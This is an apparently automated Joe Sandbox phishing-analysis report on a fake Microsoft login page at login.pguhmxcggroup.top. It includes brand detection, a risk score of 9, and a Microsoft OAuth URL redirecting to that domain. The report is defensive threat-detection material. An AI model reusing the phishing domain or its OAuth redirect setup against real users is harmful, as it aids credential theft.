|
URL: https://login.pguhmxcggroup.top/?login_hint=mstest%40domain.com&username=mstest%40domain.com&sso_reload=true Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Sign in",
"prominent_button_name": "Next",
"text_input_field_labels": [
"mstest@domain.com"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
|
URL: https://login.pguhmxcggroup.top/?login_hint=mstest%40domain.com&username=mstest%40domain.com&sso_reload=true Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "This username may be incorrect. Make sure you typed it correctly. Otherwise, contact your admin.",
"prominent_button_name": "Next",
"text_input_field_labels": [
"mstest@domain.com"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
|
URL: https://login.pguhmxcggroup.top/?login_hint=mstest%40domain.com&username=mstest%40domain.com&sso_reload=true Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
URL: https://login.pguhmxcggroup.top/?login_hint=mstest%40domain.com&username=mstest%40domain.com&sso_reload=true Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
URL: https://login.pguhmxcggroup.top/?login_hint=mstest%40domain.com&username=mstest%40domain.com&sso_reload=true Model: Joe Sandbox AI | { "legit_domain": "microsoft.com", "classification": "wellknown", "reasons": [ "The brand 'Microsoft' is a well-known global technology company.", "The legitimate domain for Microsoft is 'microsoft.com'.", "The provided URL 'login.pguhmxcggroup.top' does not match the legitimate domain.", "The URL contains unusual elements such as 'pguhmxcggroup' and uses a '.top' domain extension, which is uncommon for Microsoft.", "The presence of 'login' in the subdomain is a common tactic used in phishing to mimic login pages." ], "riskscore": 9}
Google indexed: False |
URL: login.pguhmxcggroup.top
Brands: Microsoft
Input Fields: mstest@domain.com |
URL: https://login.pguhmxcggroup.top/?login_hint=mstest%40domain.com&username=mstest%40domain.com&sso_reload=true Model: Joe Sandbox AI | { "legit_domain": "microsoft.com", "classification": "wellknown", "reasons": [ "The brand 'Microsoft' is a well-known global technology company.", "The legitimate domain for Microsoft is 'microsoft.com'.", "The provided URL 'login.pguhmxcggroup.top' does not match the legitimate domain.", "The URL contains unusual elements such as 'pguhmxcggroup' which do not relate to Microsoft.", "The domain extension '.top' is uncommon for a well-known brand like Microsoft.", "The presence of 'login' in the subdomain is a common tactic used in phishing to mimic login pages." ], "riskscore": 9}
Google indexed: False |
URL: login.pguhmxcggroup.top
Brands: Microsoft
Input Fields: mstest@domain.com |
URL: https://login.live.com/oauth20_authorize.srf?scope=openid+profile+email+offline_access&response_type=code&client_id=51483342-085c-4d86-bf88-cf50c7252078&response_mode=form_post&redirect_uri=https%3a%2f%2flogin.pguhmxcggroup.top%2fcommon%2ffederation%2foau Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
|
URL: https://login.live.com Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": true,
"brand_spoofing_attempt": false,
"third_party_hosting": false
} |
URL: https://login.live.com |
URL: https://login.live.com/oauth20_authorize.srf?scope=openid+profile+email+offline_access&response_type=code&client_id=51483342-085c-4d86-bf88-cf50c7252078&response_mode=form_post&redirect_uri=https%3a%2f%2flogin.pguhmxcggroup.top%2fcommon%2ffederation%2foau Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
URL: https://pguhmxcggroup.top Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": true,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": true
} |
URL: https://pguhmxcggroup.top |